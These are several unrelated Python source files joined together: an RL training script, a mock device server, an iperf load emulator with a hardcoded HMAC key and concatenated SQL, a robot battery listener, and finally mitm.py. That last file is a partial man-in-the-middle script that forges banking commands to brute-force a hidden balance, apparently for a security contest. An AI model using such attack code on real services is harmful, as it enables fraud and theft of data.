parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=16, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=2 * int(1e6), type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=4, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=4, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--q_cost", default=1,
type=float, help="q cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
def casalearn(
flags,
actor_model,
model,
batch,
initial_agent_state,
optimizer,
scheduler,
lock=threading.Lock(), # noqa: B008
):
"""Performs a learning (optimization) step."""
with lock:
# print('learn start')
learner_outputs, unused_state = model(batch, initial_agent_state)
# print('forward ok')
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
bootstrap_qvalue = learner_outputs["q"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * flags.discounting
vtrace_returns = some_trace.v_trace_from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
# print('vtrace ok')
retrace_returns = some_trace.retrace_from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
q_values=learner_outputs["q"],
bootstrap_value=bootstrap_qvalue,
)
# print('retrace ok')
pg_loss = some_loss.compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * some_loss.compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * some_loss.compute_entropy_loss(
learner_outputs["policy_logits"]
)
q_loss = flags.q_cost * some_loss.compute_baseline_loss(
retrace_returns.qs - learner_outputs["q_action"]
)
total_loss = pg_loss + baseline_loss + entropy_loss + q_loss
episode_returns = batch["episode_return"][batch["done"]]
optimizer.zero_grad()
total_loss.backward()
grad = torch.nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
optimizer.step()
scheduler.step()
# print('update ok')
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
"q_loss": q_loss.item(),
"grad_norm": grad.norm().item()
}
actor_model.load_state_dict(model.state_dict())
return stats
Net = AtariCasaNet
def main(flags):
initial_agent_state_buffers = []
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
plogger = file_writer.FileWriter(
xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
)
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda:1")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags.env)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
logging.info('start create_buffers')
buffers = create_buffers(flags.unroll_length, flags.num_buffers, env.observation_space.shape, model.num_actions)
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
logging
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal step, stats
timings = prof.Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings=timings
)
# print('get batch ok')
stats = casalearn(
flags, model, learner_model, batch, agent_state, optimizer, scheduler
)
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn %s",timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
def checkpoint():
if flags.disable_checkpoint:
return
logging.info("Saving checkpoint to %s", checkpointpath)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"flags": vars(flags),
},
checkpointpath,
)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(20)
if timer() - last_checkpoint_time > 10 * 60: # Save every 10 min.
checkpoint()
last_checkpoint_time = timer()
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %s \nStats: %s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
return # Try joining actors then quit.
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
checkpoint()
plogger.close()
if __name__ == "__main__":
flags = parser.parse_args()
main(flags)
|
mock.py | import socket
import json
import threading
import time
from typing import Dict, Union, Any
from localite.flow.payload import Queue
from localite.flow.loc import localiteClient
def append(outqueue: Queue, is_running: threading.Event, imi: float = 1):
from queue import Full
def Messages():
continual = [
{"pointer_status": "BLOCKED"},
{"reference_status": "BLOCKED"},
{"coil_1_status": "BLOCKED"},
{"coil_0_status": "BLOCKED"},
{
"coil_0_position": {
"q0": 17.0,
"qx": 17.0,
"qy": 17.0,
"qz": 17.0,
"x": 37,
"y": 77,
"z": 53,
}
},
]
while True:
yield from continual
message = Messages()
while not is_running.is_set():
time.sleep(0.1)
print("Starting MOCK-MSG-QUEUER")
while is_running.is_set():
time.sleep(imi)
msg = next(message)
try:
outqueue.put_nowait(msg)
except Full:
outqueue.get()
outqueue.task_done()
outqueue.put(msg)
print("MOCK:BACKLOG", outqueue.unfinished_tasks)
def kill(host: str = "127.0.0.1", port=6666):
client = localiteClient(host, port)
msg = json.dumps({"cmd": "poison-pill"})
client.send(msg)
mocked_settings = {
"coil_0_amplitude": 1,
"coil_0_didt": 99,
"coil_0_position": {
"q0": 17.0,
"qx": 17.0,
"qy": 17.0,
"qz": 17.0,
"x": 37,
"y": 77,
"z": 53,
},
"coil_0_position_control": {"position_reached": "TRUE", "index": 1},
"coil_0_response": {
"mepmaxtime": 18,
"mepamplitude": 50,
"mepmin": -25,
"mepmax": 25,
},
"coil_0_status": "OK",
"coil_0_stimulator_connected": "TRUE",
"coil_0_stimulator_mode": {"value": 0, "name": "mock"},
"coil_0_stimulator_model": {"value": 0, "name": "mock"},
"coil_0_stimulator_status": 1,
"coil_0_target_index": 1,
"coil_0_temperature": 35,
"coil_0_type": "Mock0704",
"coil_0_waveform": {"value": 1, "name": "mockphasic"},
"coil_1_amplitude": 1,
"coil_1_didt": 99,
"coil_1_position": {
"q0": 17.0,
"qx": 17.0,
"qy": 17.0,
"qz": 17.0,
"x": 37,
"y": 77,
"z": 53,
},
"coil_1_position_control": {"position_reached": "TRUE", "index": 1},
"coil_1_response": {
"mepmaxtime": 18,
"mepamplitude": 50,
"mepmin": -25,
"mepmax": 25,
},
"coil_1_status": "OK",
"coil_1_stimulator_connected": "TRUE",
"coil_1_stimulator_mode": {"value": 0, "name": "mock"},
"coil_1_stimulator_model": {"value": 0, "name": "mock"},
"coil_1_stimulator_status": 1,
"coil_1_target_index": 1,
"coil_1_temperature": 35,
"coil_1_type": "Mock0704",
"coil_1_waveform": {"value": 1, "name": "mockphasic"},
"current_instrument": "COIL_0",
"navigation_mode": "NAVIGATION",
"patient_registration_status": "REGISTERED",
"pointer_position": {
"q0": 17.0,
"qx": 17.0,
"qy": 17.0,
"qz": 17.0,
"x": 37,
"y": 77,
"z": 53,
},
"pointer_position_control": {"position_reached": "TRUE", "index": 1},
"pointer_status": "OK",
"pointer_target_index": 1,
"reference_status": "OK",
}
def create_response(msg: Any) -> Union[Dict, None]:
if msg is None:
return None
key = list(msg.keys())[0]
val = msg[key]
if key == "current_instrument": # set current instrument
if val in ["NONE", "POINTER", "COIL_0", "COIL_1"]:
return msg
else:
return {"error": msg}
if key in [
"pointer_target_index",
"coil_0_target_index",
"coil_1_target_index",
]: # set target index
if type(val) is int and val > 0:
return msg
else:
return {
"request": {key: val},
"reason": f"Index value out of range. Value: {val}, Range: [0..0]",
}
elif key == "single_pulse": # trigger
if val in ["COIL_0", "COIL_1"]:
return {val.lower() + "_didt": 11}
else:
return {"error": msg}
elif key in ["coil_0_amplitude", "coil_1_amplitude"]: # set amplitude
if val >= 0 and val <= 100:
return msg
else:
return {"error": msg} # suggestion for localite
elif key in ["coil_0_response", "coil_1_response"]: # set response
if val["mepmaxtime"] < 0 or val["mepmaxtime"] > 100000:
return {"error": msg}
for subkey in ["mepamplitude", "mepmin", "mepmax"]:
if val[subkey] < -51200 or val[subkey] > 51200:
return {"error": msg} # suggestion for localite
return msg
elif key == "get":
try:
return {val: mocked_settings[val]}
except KeyError:
return {"error": msg}
else:
return {"error": msg}
def send(client: socket.socket, outqueue: Queue) -> None:
while outqueue.unfinished_tasks == 0:
time.sleep(0.1)
item = outqueue.get()
outqueue.task_done()
print("MOCK:SEND", item, outqueue.unfinished_tasks)
msg = json.dumps(item).encode("ascii")
client.sendall(msg)
# client.close()
class Mock(threading.Thread):
def __init__(self, host: str = "127.0.0.1", port: int = 6666):
threading.Thread.__init__(self)
self.host = host
self.port = port
self.is_running = threading.Event()
def await_running(self):
while not self.is_running.is_set(): # pragma no cover
pass
@staticmethod
def read_msg(client: socket.socket) -> Union[Dict, None]:
"parse the message"
client.settimeout(0.1)
msg = b" "
while True:
try:
prt = client.recv(1)
msg += prt
dmsg = json.loads(msg.decode("ascii"))
return dmsg
except json.JSONDecodeError: # pragma no cover
pass
except socket.timeout:
return None
except Exception as e: # pragma no cover
print("MOCK:READ_MSG:", e)
return None
def run(self):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((self.host, self.port))
listener.settimeout(1)
listener.listen(1) # one unaccepted client is allowed
outqueue = Queue(maxsize=100)
appender = threading.Thread(target=append, args=(outqueue, self.is_running,))
self.is_running.set()
appender.start()
print(f"Starting MOCK at {self.host}:{self.port}")
while self.is_running.is_set():
try:
client, address = listener.accept()
msg = self.read_msg(client)
if msg is not None:
print("MOCK:RECV", msg, address)
if "cmd" in msg.keys() and "poison-pill" in msg.values():
self.is_running.clear()
break
else:
answer = create_response(msg)
print("MOCK:ANSWER", answer)
if answer is not None:
outqueue.put(answer)
else:
# always send a message, if there is none queued, wait
# until one is available
send(client, outqueue)
except Exception as e: # pragma no cover
print("MOCK:EXC", str(e))
time.sleep(0.001)
print("Shutting MOCK down")
def kill(self):
kill(self.host, self.port)
|
run_iperf.py | #Copyright 2012-2013 SAP Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is part of the COCOMA framework
#
# COCOMA is a framework for COntrolled COntentious and MAlicious patterns
#
'''
Usage: iperf [-s|-c host] [options]
iperf [-h|--help] [-v|--version]
Client/Server:
-f, --format [kmKM] format to report: Kbits, Mbits, KBytes, MBytes
-i, --interval # seconds between periodic bandwidth reports
-l, --len #[KM] length of buffer to read or write (default 8 KB)
-m, --print_mss print TCP maximum segment size (MTU - TCP/IP header)
-o, --output <filename> output the report or error message to this specified file
-p, --port # server port to listen on/connect to
-u, --udp use UDP rather than TCP
-w, --window #[KM] TCP window size (socket buffer size)
-B, --bind <host> bind to <host>, an interface or multicast address
-C, --compatibility for use with older versions does not sent extra msgs
-M, --mss # set TCP maximum segment size (MTU - 40 bytes)
-N, --nodelay set TCP no delay, disabling Nagle's Algorithm
-V, --IPv6Version Set the domain to IPv6
Server specific:
-s, --server run in server mode
-U, --single_udp run in single threaded UDP mode
-D, --daemon run the server as a daemon
Client specific:
-b, --bandwidth #[KM] for UDP, bandwidth to send at in bits/sec
(default 1 Mbit/sec, implies -u)
-c, --client <host> run in client mode, connecting to <host>
-d, --dualtest Do a bidirectional test simultaneously
-n, --num #[KM] number of bytes to transmit (instead of -t)
-r, --tradeoff Do a bidirectional test individually
-t, --time # time in seconds to transmit for (default 10 secs)
-F, --fileinput <name> input the data to be transmitted from a file
-I, --stdin input the data to be transmitted from stdin
-L, --listenport # port to receive bidirectional tests back on
-P, --parallel # number of parallel client threads to run
-T, --ttl # time-to-live, for multicast (default 1)
-Z, --linux-congestion <algo> set TCP congestion control algorithm (Linux only)
Miscellaneous:
-x, --reportexclude [CDMSV] exclude C(connection) D(data) M(multicast) S(settings) V(server) reports
-y, --reportstyle C report as a Comma-Separated Values
-h, --help print this message and quit
-v, --version print version information and quit
[KM] Indicates options that support a K or M suffix for kilo- or mega-
The TCP window size option can be set by the environment variable
TCP_WINDOW_SIZE. Most other options can be set by an environment variable
IPERF_<long option name>, such as IPERF_BANDWIDTH.
'''
import math,time,multiprocessing,logging
from xml.etree import ElementTree
from xml.dom import minidom
import xml.etree.ElementTree as ET
import Pyro4,imp,time,sys,os,psutil
import sqlite3 as sqlite
import datetime as dt
import subprocess
from signal import *
from subprocess import *
from collections import OrderedDict
from Library import getHomepath
#perhaps needs to be set somewhere else
Pyro4.config.HMAC_KEY='pRivAt3Key'
#Pyro4.config.SERIALIZER='pickle'
try:
# HOMEPATH= os.environ['COCOMA']
HOMEPATH = getHomepath()
except:
print "no $COCOMA environmental variable set"
sys.path.insert(0, getHomepath() + '/emulators/') #Adds dir to PYTHONPATH, needed to import abstract_emu
from abstract_emu import *
class emulatorMod(abstract_emu):
def __init__(self,emulationID,distributionID,emulationLifetimeID,resourceTypeDist,duration,emulatorArg, stressValues,runNo,emuDuration):
self.emulationID = emulationID
self.emulationLifetimeID = emulationLifetimeID
self.duration = duration
duration =float(duration)
self.stressValues = stressValues
self.runNo=runNo
self.distributionID=distributionID
#injecting server value
try:
print emulatorArg["server"]
except:
emulatorArg.update({"server":0})
if resourceTypeDist.lower() == "net" and emulatorArg["server"]==0:
netClientProc = multiprocessing.Process(target = netClientLoad, args=(distributionID,runNo,stressValues,emulatorArg["serverport"],emulatorArg["serverip"],emulationID,emulatorArg,emuDuration,duration))
netClientProc.start()
netClientProc.join()
elif emulatorArg["server"]==1:
netServerProc = multiprocessing.Process(target = netServerLoad, args=(distributionID,runNo,emulatorArg["serverport"],emuDuration))
netServerProc.start()
netServerProc.join()
def netClientLoad(distributionID,runNo,stressValues,serverPort,serverIP,emulationID,emulatorArg,emuDuration,duration):
daemonPort=str(readLogLevel("schedport"))
#check if the iperf server process already running
PROCNAME = "iperf -s -p "+str(emulatorArg["serverport"])
serverUri = "PYRO:scheduler.daemon@"+str(serverIP)+":"+daemonPort
serverDaemon=Pyro4.Proxy(serverUri)
fakeemulationLifetimeID="1"
fakeemulatorArg = emulatorArg
fakeemulatorArg.update({'server': 1})
fakeresourceTypeDist ="net"
fakestressValue = 1
fakeRunNo = 1 #must not be zero
emulator="iperf"
serverJobStatus=serverDaemon.createCustomJob(emulationID,distributionID,fakeemulationLifetimeID,duration,emulator,fakeemulatorArg,fakeresourceTypeDist,fakestressValue,fakeRunNo,PROCNAME,emuDuration)
if serverJobStatus == 1:
print "!!!Server "+ "PYRO:scheduler.daemon@"+str(serverIP)+daemonPort +" job was created! for duration of Distribution"
print "!!!Started server for "+str(emuDuration)+" sec"
elif serverJobStatus == 2:
print "!!!Server "+ "PYRO:scheduler.daemon@"+str(serverIP)+daemonPort +" job already running"
elif serverJobStatus == 0:
print "!!!Unable to start iperf server on: "+str(serverIP)+":"+str(serverPort)+"\n NET distribution(-s) Failed"
if runNo == str(0):
time.sleep(2)
print "\n\nThis is netClientLoad:\ndistributionID,runNo,stressValues,serverPort,serverIP,emulationID,duration\n",distributionID,runNo,stressValues,serverPort,serverIP,emulationID,duration,"\n\n"
bandwith =stressValues
try:
runIperf = subprocess.Popen(["iperf","-c",str(serverIP),"-p",str(serverPort),"-b",str(bandwith)+"mb","-t",str(duration)])
runIperfPidNo =runIperf.pid
time.sleep(float(duration))
#catching failed runs
if zombieBuster(runIperfPidNo, "iperf"):
runIperf.wait()
message="Error in the emulator execution"
executed="False"
dbWriter(distributionID,runNo,message,executed)
return False
else:
runIperf.terminate()
message="Success"
executed="True"
dbWriter(distributionID,runNo,message,executed)
return True
except Exception, e:
print "run_Iperf job exception: ", e
def netServerLoad(distributionID,runNo,netPort,emuDuration):
runIperfPidNo=0
try:
try:
runIperf = subprocess.Popen(["iperf","-s", "-p",str(netPort),"-u"])
except Exception, e:
print e
runIperfPidNo =runIperf.pid
except Exception, e:
"run_runIperf job exception: ", e
time.sleep(float(emuDuration)+5)
#catching failed runs
if zombieBuster(runIperfPidNo, "iperf"):
runIperf.wait()
message="Fail"
executed="False"
else:
print "trying to kill process"
runIperf.terminate()
message="Success"
executed="True"
dbWriter(distributionID,runNo,message,executed)
def emulatorHelp():
plainText= """
Iperf emulator is used to generate workload over network between two COCOMA VM's - Client and Server. Emulation parameters (XML document) which include IP addresses
of Client and Server COCOMA are sent to Client VM. Client VM then connects to Server VM starts Iperf in server mode ready to accept packages.
In case of UDP packets we are changing bandwidth load in "mb".
1) UDP setup example:
<distributions>
<name>NET_distro</name>
<startTime>0</startTime>
<!--duration in seconds -->
<duration>10</duration>
<granularity>1</granularity>
<distribution href="/distributions/linear" name="linear" />
<!--network bandwidth utilizationrange-->
<startLoad>10</startLoad>
<stopLoad>10</stopLoad>
<emulator href="/emulators/iperf" name="iperf" />
<emulator-params>
<resourceType>NET</resourceType>
<serverip>10.55.168.166</serverip>
<!--Leave "0" for default 5001 port -->
<serverport>0</serverport>
<!--if TCP is needed just change "UDP" to "TCP"-->
</emulator-params>
</distributions>
"""
return plainText
'''
here we specify how many arguments emulator instance require to run properly
'''
def emulatorArgNames(Rtype=None):
'''
type = <NET>
IMPORTANT: All argument variable names must be in lower case
'''
#discovery of supported resources
if Rtype == None:
argNames = ["net"]
return argNames
if Rtype.lower() == "net":
argNames=[("serverip",{"upperBound":10000,"lowerBound":1, "argHelp":"Server IP to connect to"}),
("serverport", {"upperBound":10000,"lowerBound":0, "argHelp": "Server port to connect to"})]
logging.debug( "Use Arg's: "+str(argNames))
return OrderedDict(argNames)
def readLogLevel(column):
'''
Gets log level name from database
'''
try:
if HOMEPATH:
conn = sqlite.connect(HOMEPATH+'/data/cocoma.sqlite')
else:
conn = sqlite.connect('./data/cocoma.sqlite')
c = conn.cursor()
c.execute('SELECT '+str(column)+' FROM config')
logLevelList = c.fetchall()
c.close()
except sqlite.Error, e:
print "Error getting \"config\" table data %s:" % e.args[0]
print e
return False
if logLevelList:
for row in logLevelList:
logLevel=row[0]
return logLevel |
battery_printer.py | import json
import random
import string
import threading
import time
from typing import Callable, Dict, Union
import websocket
from pymitter import EventEmitter
ee = EventEmitter()
event_name = "battery_loader_" + "".join(
random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(6)
)
DEFAULT_DURATION = 2
class MistyEvent:
def __init__(
self,
ip: str,
type_str: str,
event_name: str,
return_property: str,
debounce: int,
len_data_entries: int,
event_emitter: Union[Callable, None],
) -> None:
self.server = "ws://%s/pubsub" % ip
self.data = []
self.type_str = type_str
self.event_name = event_name
self.return_property = return_property
self.debounce = debounce
self.log = []
self.len_data_entries = len_data_entries
event_thread = threading.Thread(target=self.run, daemon=True)
event_thread.start()
if event_emitter:
self.ee = event_emitter
else:
self.ee = False
def run(self) -> None:
self.ws = websocket.WebSocketApp(
self.server,
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
)
self.ws.run_forever()
def on_message(self, ws, message) -> None:
message = json.loads(message)
mes = message["message"]
if len(self.data) > self.len_data_entries:
self.data = self.data[1:-1]
self.data.append(mes)
if self.ee:
self.ee.emit(self.event_name, mes)
def on_error(self, ws, error) -> None:
if len(self.log) > self.len_data_entries:
self.log = self.log[1:-1]
self.log.append(error)
if self.ee:
self.ee.emit("error_%s" % self.event_name, error)
def on_close(self, ws) -> None:
mes = "Closed"
if len(self.log) > self.len_data_entries:
self.log = self.log[1:-1]
self.log.append(mes)
if self.ee:
self.ee.emit("close_%s" % self.event_name, mes)
def on_open(self, ws) -> None:
self.log.append("Opened")
self.subscribe()
ws.send("")
if self.ee:
self.ee.emit("open_%s" % self.event_name)
def subscribe(self) -> None:
msg = {
"Operation": "subscribe",
"Type": self.type_str,
"DebounceMs": self.debounce,
"EventName": self.event_name,
"ReturnProperty": self.return_property,
}
msg_str = json.dumps(msg, separators=(",", ":"))
self.ws.send(msg_str)
def unsubscribe(self) -> None:
msg = {"Operation": "unsubscribe", "EventName": self.event_name, "Message": ""}
msg_str = json.dumps(msg, separators=(",", ":"))
self.ws.send(msg_str)
self.ws.close()
@ee.on(event_name)
def listener(data: Dict) -> None:
print(data)
def battery_printer(
misty_ip: str, duration: Union[int, float] = DEFAULT_DURATION
) -> None:
me = MistyEvent(misty_ip, "BatteryCharge", event_name, None, 250, 10, ee)
time.sleep(duration)
me.unsubscribe()
if __name__ == "__main__":
battery_printer("192.168.0.103")
|
mitm.py | #!/usr/bin/env python3
import socket
import argparse
import threading
import signal
import json
import requests
import sys
import time
import traceback
from queue import Queue
from contextlib import contextmanager
CLIENT2SERVER = 1
SERVER2CLIENT = 2
running = True
"""
"fast" TLS brute-force
@author: Hung Nguyen
"""
ERROR_MARK = 48
MAX_AMOUNT_LEN = 9
MAX_FILE_LENGTH = 4
MAX_ACCOUNT_LENGTH = 11
NEW_COMMAND_FORMAT = '{ "type": "input",' \
' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
'"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-n","%IM_AMOUNT%"],"base64": false}}'
DEPOSIT_COMMAND_FORMAT = '{ "type": "input",' \
' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
'"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-d","%IM_AMOUNT%"],"base64": false}}'
WITHDRAW_COMMAND_FORMAT = '{ "type": "input",' \
' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
'"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-w","%IM_AMOUNT%"],"base64": false}}'
BALANCE_COMMAND_FORMAT = '{ "type": "input",' \
' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
'"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-g"],"base64": false}}'
amount_detected = ''
cur_amount_len = 0
next_digit = 0
last_digit = False
cur_file = 0
cur_file_name = None
cur_account = 0
cur_account_name = None
# 0: init (creating account)
# 1: sent acc created, 2: sent init withdraw (checking balance)
# 3: make withdraw/deposit
# 4: check balance
# 5: failed, 6: finished
cur_state = 0
cur_length = 0
def log(m):
print(m, file=sys.stderr)
def send_command(shared):
global cur_state
global cur_length
global amount_detected
global cur_amount_len
global next_digit
global last_digit
global cur_file
global cur_file_name
global cur_account
global cur_account_name
try:
if cur_state == 0:
cur_length = float("inf")
next_digit = 0
cur_file += 1
cur_file_name = str(cur_file).zfill(MAX_FILE_LENGTH)
cur_account += 1
cur_account_name = str(cur_account).zfill(MAX_ACCOUNT_LENGTH)
json_command = NEW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', '%AMOUNT%')
log("[MITM]: found so far: %s" % amount_detected)
log("[MITM]: sending new: %s" % json_command)
elif cur_state == 1 and cur_amount_len > 0:
amount = amount_detected + str('').zfill(MAX_AMOUNT_LEN - cur_amount_len) + '.00'
json_command = WITHDRAW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
log("[MITM]: found so far: %s" % amount_detected)
log("[MITM]: sending wit: %s" % json_command)
elif cur_state == 2 or (cur_state == 1 and cur_amount_len == 0):
cur_state = 2
json_command = BALANCE_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name)
log("[MITM]: found so far: %s -- current length: %d"
% (amount_detected, cur_length if cur_length != float('inf') else -1))
log("[MITM]: sending bal: %s" % json_command)
elif cur_state == 3:
if next_digit >= 10:
cur_state = 6
log("[MITM] failed to brute-force")
json_command = '{"type": "done"}'
else:
amount = '1' + str('').zfill(MAX_AMOUNT_LEN - cur_amount_len - 1) + '.00'
if last_digit:
json_command = DEPOSIT_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
next_digit += 1
log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
% (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
log("[MITM]: sending dep - step: %s" % json_command)
else:
json_command = WITHDRAW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
next_digit += 1
log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
% (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
log("[MITM]: sending wit - step: %s" % json_command)
elif cur_state == 4:
json_command = BALANCE_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
.replace('%IM_ACCOUNT%', cur_account_name)
log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
% (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
log("[MITM]: sending bal: %s" % json_command)
else:
json_command = '{"type": "done"}'
log("[MITM]: invalid state")
# send to command server
command = json.loads(json_command)
shared.put(command, block=True)
except Exception:
log(traceback.format_exc())
def mitm(buff, direction, shared):
global cur_state
global cur_length
global amount_detected
global cur_amount_len
global next_digit
global last_digit
# hb = "".join("{:02x}".format(c) for c in buff)
